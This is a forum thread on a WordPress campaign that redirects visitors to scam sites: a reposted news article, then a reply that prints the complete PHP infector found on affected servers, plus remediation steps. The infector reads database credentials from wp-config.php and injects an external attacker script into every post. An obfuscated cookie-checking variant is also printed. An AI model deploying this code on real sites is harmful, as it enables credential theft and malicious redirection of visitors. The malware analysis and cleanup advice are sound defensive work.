Jump to content
Kev

Thousands of WordPress Sites Hacked to Redirect Visitors to Scam Sites

Recommended Posts

WordPress.jpg

 

Cybersecurity researchers have disclosed a massive campaign that's responsible for injecting malicious JavaScript code into compromised WordPress websites that redirects visitors to scam pages and other malicious websites to generate illegitimate traffic.

 

Quote

"The websites all shared a common issue — malicious JavaScript had been injected within their website's files and the database, including legitimate core WordPress files," Krasimir Konov, a malware analyst at Sucuri, said in a report published Wednesday.

 

This involved infecting files such as jquery.min.js and jquery-migrate.min.js with obfuscated JavaScript that's activated on every page load, allowing the attacker to redirect the website visitors to a destination of their choice.

 

The GoDaddy-owned website security company said that the domains at the end of the redirect chain could be used to load advertisements, phishing pages, malware, or even trigger another set of redirects.

 

malware-wordpress.jpg

 

In some instances, unsuspecting users are taken to a rogue redirect landing page containing a fake CAPTCHA check, clicking which serves unwanted ads that are disguised to look as if they come from the operating system and not from a web browser.

 

The campaign — a continuation of another wave that was detected last month — is believed to have impacted 322 websites so far, starting May 9. The April set of attacks, on the other hand, has breached over 6,500 websites.

 

Quote

"It has been found that attackers are targeting multiple vulnerabilities in WordPress plugins and themes to compromise the website and inject their malicious scripts," Konov said.

 

Found this article interesting? Follow THN on FacebookTwitter  and LinkedIn to read more exclusive content we post.

 

Source

  • Upvote 1
Link to comment
Share on other sites

E de la pluginul "Elementor"

 

Aici este sursa ce "infesteaza" jucariile:

 

<?php error_reporting(0);
ini_set('display_errors', 0);
ini_set('max_execution_time', 0);
echo "ssqqss>>>";
$d = $_SERVER['DOCUMENT_ROOT'] . "/";
$files = array();
for ($i = 0;$i < 3;$i++)
{
    try
    {
        $az = shell_exec('find ' . $d . ' -name "wp-config.php"');
        $az2 = explode("\n", $az);
        foreach ($az2 as $file)
        {
            $fil = explode("/wp-config.php", $file);
            $fil = $fil[0] . "/wp-config.php";
            array_push($files, $fil);
        }
        $d = $d . "../";
    }
    catch(Exception $e)
    {
    }
}
$l = "/";
for ($i = 0;$i < 3;$i++)
{
    try
    {
        $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'] . $l);
        $display = Array(
            'php'
        );
        $search = Array(
            'wp-config.php'
        );
        $files_ar = array();
        foreach (new RecursiveIteratorIterator($it) as $file)
        {
            if (strpos($file->getFilename() , 'wp-config.php') !== false)
            {
                array_push($files, $file->getPathname());
            }
        }
        $l .= "../";
    }
    catch(Exception $e)
    {
    }
}
$files = array_unique($files);
foreach ($files as $file)
{
    make_index_blog($file);
}
die();
function get_var_reg($pat, $text)
{
    if ($c = preg_match_all("/" . $pat . "/is", $text, $matches))
    {
        return $matches[1][0];
    }
    return "";
}
function getijstonemoretime($path)
{
}
function make_index_blog($path)
{
    echo "iii->>try:" . $path . "<br />";
    $az = shell_exec('cat ' . $path);
    if (strpos($az, "DB_PASSWORD") !== false)
    {
    }
    else
    {
    }
    if (strpos($az, "DB_PASSWORD") !== false)
    {
        sqldo($az);
    }
}
function sqldo($content)
{
    $siteurl = "null";
    if (strpos($content, "DB_NAME") !== false)
    {
        $db = get_var_reg("DB_NAME['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
        $host = get_var_reg("DB_HOST['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
        $user = get_var_reg("DB_USER['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
        $pass = get_var_reg("DB_PASSWORD['|\"].*?,.*?['|\"](.*?)['|\"]", $content);
        $conn = new mysqli($host, $user, $pass);
        if ($conn->connect_error)
        {
            echo $conn->connect_error;
        }
        else
        {
            $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%options%'";
            $result = $conn->query($q) or die($conn->error);
            while ($row = $result->fetch_assoc())
            {
                $result5 = $conn->query("SHOW COLUMNS FROM " . $db . "." . $row["TABLE_NAME"] . " LIKE 'option_name'");
                if ($result5->num_rows > 0)
                {
                    $q2 = "SELECT option_value FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . "  where option_name='siteurl' LIMIT 1 ";
                    $result2 = $conn->query($q2) or var_dump($conn->error);
                    while ($row2 = $result2->fetch_assoc())
                    {
                        $val = $row2['option_value'];
                        $siteurl = $val;
                        echo "iii->>find222:" . $siteurl . "<br />";
                        if (strpos($siteurl, "://") !== false)
                        {
                            $k = file_get_contents($siteurl);
                            if (strpos($k, "legendarytable") !== false)
                            {
                                echo "iii->>contains:" . $siteurl . "<br />";
                            }
                            else
                            {
                                $q9 = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%posts%'";
                                $result9 = $conn->query($q9) or die($conn->error);
                                while ($row9 = $result9->fetch_assoc())
                                {
                                    $q8 = "SELECT post_content FROM " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "  LIMIT 1 ";
                                    $result8 = $conn->query($q8) or var_dump($conn->error);
                                    while ($row8 = $result8->fetch_assoc())
                                    {
                                        $val8 = $row8['post_content'];
                                        if (strpos($val8, "legendarytable") === false)
                                        {
                                            $q3 = "UPDATE " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%legendarytable%'";
                                            $conn->query($q3);
                                            echo "iii->>" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />";
                                        }
                                        else
                                        {
                                            echo "iii->>222ALREADY:" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />";
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
        $conn->close();
    }
    return $siteurl;
}
function search_file_index($dir, $file_to_search)
{
    $files = @scandir($dir);
    if ($files == false)
    {
        $dir = substr($dir, 0, -3);
        if (strpos($dir, '../') !== false)
        {
            search_file_index($dir, $file_to_search);
            return;
        }
        if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/")
        {
            search_file_index($dir, $file_to_search);
            return;
        }
    }
    foreach ($files as $key => $value)
    {
        $path = realpath($dir . DIRECTORY_SEPARATOR . $value);
        if (!is_dir($path))
        {
            if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false)
            {
                make_index_upload($path);
            }
        }
        else if ($value != "." && $value != "..")
        {
            search_file_index($path, $file_to_search);
        }
    }
}

 

Prin fisiere, o alta versiune (cea cu cookie check) arata asa:

 

$v=chr(112).chr(114).chr(101).chr(103).chr(95).chr(109).chr(97).chr(116).chr(99).chr(104);
if(!$v(chr(35).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr(97).chr(100).chr(109).chr(105).chr(110).chr(124).chr(119).chr(112).chr
(45).chr(115).chr(101).chr(116).chr(116).chr(105).chr(110).chr(103).chr(115).chr(124).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr
(108).chr(111).chr(103).chr(103).chr(101).chr(100).chr(35).chr(105),implode(" ",array_keys($_COOKIE)))){echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).
chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(116).chr(114).chr(105).chr(99).chr(107).chr(46).chr(108).chr(10
1).chr(103).chr(101).chr(110).chr(100).chr(97).chr(114).chr(121).chr(116).chr(97).chr(98).chr(108).chr(101).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(101).chr(119).c
hr(115).chr(46).chr(106).chr(115).chr(63).chr(118).chr(61).chr(54).chr(46).chr(51).chr(46).chr(50).chr(39).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).ch
r(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).
chr(105).chr(112).chr(116).chr(62);}

 

Pentru a verifica checksum la fisierele din core, va recomand wp-cli

 

Exemplu:

 

./wp --allow-root core verify-checksums
Warning: File doesn't verify against checksum: wp-login.php
Warning: File doesn't verify against checksum: wp-admin/index.php
Warning: File doesn't verify against checksum: wp-admin/admin.php
Warning: File doesn't verify against checksum: wp-admin/admin-ajax.php
Warning: File should not exist: wp-admin/try.php
Error: WordPress installation doesn't verify against checksums.

 

Ar trebui sa dea cam asa:

 

./wp --allow-root core verify-checksums
Success: WordPress installation verifies against checksums.

 

Este necesara si eliminarea scripturilor din posts (wp_posts). Se poate identifica foarte usor printr-un query mysql:

 

select * from wp_posts where post_content like '%news.js%';

 

De asemenea, se poate elimina din wp_posts utilizand replace. Aici vedeti ca pot fi mai multe versiuni. Puteti extinde cautarea dupa %script% sau/si legendarytable si apoi faceti replace la ce e necesar

 

update wp_posts set post_content = replace(post_content, "<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>", "");

 

Mai este inca o versiune ce isi instaleaza 2 plugine (inactive) prin care isi pot rula diverse.

O alta versiune isi face check la cookies. Acolo unde exista cookies, nu face redirect catre alte site. Vizeaza doar vizitatori noi pe care-i redirecteaza

 

Sfat:

1. Nu mai instalati toate låbile de plugine

2. Folositi in plm Content-Security-Policy! :)))

  • Upvote 5
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...